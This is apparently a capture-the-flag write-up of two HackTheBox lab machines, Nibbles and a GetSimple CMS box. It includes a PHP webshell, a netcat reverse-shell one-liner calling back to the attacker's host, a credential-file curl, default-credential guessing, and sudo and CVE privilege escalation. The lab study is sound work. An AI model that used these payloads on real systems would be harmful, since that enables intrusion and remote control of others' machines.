some vulnerable machines on HackTheBox
Written by: Jan Fok
First, I ran an nmap scan on the top 1000 ports on the system. We can see that there is an OpenSSH service running on port 22 and an Apache HTTP server running on port 80.
Using common HTTP scripts from Nmap Scripting Engine (NSE) does not yield anything useful.
Using whatweb
, we can check what web applications are in use on the server. When I access the web page on a web browser, I see an empty web page with words “Hello World!“. Looking in the source code, there is a comment indicating the existence of a directory called /nibbleblog/
.
Using whatweb
on the nibbleblog directory, we can see the technologies in use, which includes HTML5, JQuery, PHP and nibbleblog.
A google search for “nibbleblog exploits” yields a Nibbleblog File Upload Vulnerability. This flaw allows an authenticated attacker to upload and execute PHP code.
The Metasploit version of th exploit was tested on version 4.0.3. However, we still don’t know what version of nibbleblog is running on our target.
Looking at the source code in the Metasploit module, we can see that is requires a username and password to authenticate at the admin portal which is found at admin.php
.
Next, I used gobuster
to enumerate the directories available using dirbuster's
common wordlist. The results returns 11 directories, which includes the admin.php
, /content
and /README
directories.
Curling the README page shows us that the version of nibbleblog running on the target is indeed v4.0.3. I now have confirmation that the web server is vulnerable to the exploit we have found.
Next, I need valid credentials to start the exploit. Looking through the “contents” folder, we find a file under a nested folder labelled “private” called “users.xml”. Using the following command, we can obtain the xml data in our terminal:
curl http://[IP]/nibbleblog/content/private/users.xml | xmllint --format -
The file shows us that admin
is indeed a valid username.
Next, we looked at the config.xml
file. There are two mentions of nibbles
in this file. According to HackTheBox, it is not uncommon to crack a password hash using a wordlist generated by crawling and scaping the website.
Using the credentials admin:nibbles
, we were able to obtain access to the admin portal.
Now that we have identified an exploit that would work on the target and we have valid credentials, we can begin with our exploitation.
Looking around the admin portal, we find that we are able to upoad files under the upload image
plugin. We then tested this by uploading a PHP script with some valid PHP code which returns the ID of the user.
<?php system('id'); ?>
After uploading the file, we get a bunch of error messages which indicates that the file was uploaded successfully to the server. Next, we went back into the /content
folder and found a nested file called image.PHP
. Opening this file, we can see the id of the user printed inside.
This indicates that we successfully obtained remote code execution (RCE). Next, we will update our code to upload a reverse shell back to our machine. We obtained the following code from Payload All The Things
<?php system('rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc [Local IP] [Local Port] >/tmp/f'); ?>
I then used netcat
to open a listening port on our machine to receive the reverse shell.
Uploading the reverse shell script onto the server and accessing the “image.php” file once again, I was able to obtain a reverse shell on my local machine.
I was able to obtain the user flag from the home directory.
79c03865431abf47b90ef24b9695e148
Next, I will try to escalate privileges to root
. There is a zip file labelled personal.zip
in the home directory. Unzipping the file, we find a file called monitor.sh
inside it.
We next uploaded a LinEnum.sh Script which would enumerate a Linux machine locally. This was done using a python web server and curling the file on the target from our local machine.
We then run the script and from the results of the enumeration, we can see that we have sudo
access to run the monitor.sh
file without requiring a password.
We can then append a one-line reverse shell script to the monitor.sh
file and run the file using sudo to obtain a reverse shell on our machine.
Once we receive the the reverse shell, I was able to obtain the root flag from the root directory.
de5e5d6619862a8aa5b9b212314e0cdd
Running an nmap scan on the top 1000 ports with default scripts turned on, I discover the there is an OpenSSH server running on port 22 and an Apache server v2.4.41 running on port 80. The target is running Ubuntu Linux Focal Fossa 20.04.
Using the http-enum script with our scan on port 80, I can se that there is a robots.txt
file in the web directory.
Next, I used gobuster
to enumerate the directories on the web server. The results shows that there are the directories “/admin”, “/robots.txt”, “/plugins”, “/theme” and “/data” on the web server.
Looking at the robots.txt
file, we see that the directory /admin/
is disallowed from being crawled.
Looking at the admin portal, I tried the credentials admin:admin
and managed to gain access.
I can then see that the webpage uses GetSimple CMS version 3.3.15.
After a quick google search for “GetSimple exploits”, I found that there is an XSS vulnerability for GetSimple versions 3.3.15 and older. I also found out that the exploit was readily available on Metasploit. Using the Metasploit module, I was able to obtain a reverse shell into the machine and obtained the user flag.
7002d65b149b0a4d19132a66feed21d8
I uploaded a LinPeas.sh script to the target’s /var/www/html
directory to enumerate any privilege escalation vectors.
The results of the script tells us that the machine is vulnerable to two CVE’s:
I looked for the CVEs on Metasploit and found that they were both available as modules. However, they would both not work on the target machine. Then, I tried looking for publicly available Proof of Concepts (POC) but most of them were written in C and the target did not have gcc or clang installed. However I did realise that the target had python3 installed, so I found a POC written in python3 and ran the script on the target to obtain root privileges.
f1fba6e9f71efb2630e6e34da6387842
Here, I tried to obtain the webshell without using the Metasploit module.
Doing some research on the GetSimple CMS exploit, I found a report online that described a vulnerability in the website’s theme-edit.php
file where it does not sanitize user input. This allows for arbitrary code execution. I uploaded a PHP reverse shell script to the page and obtained a reverse shell on my local machine.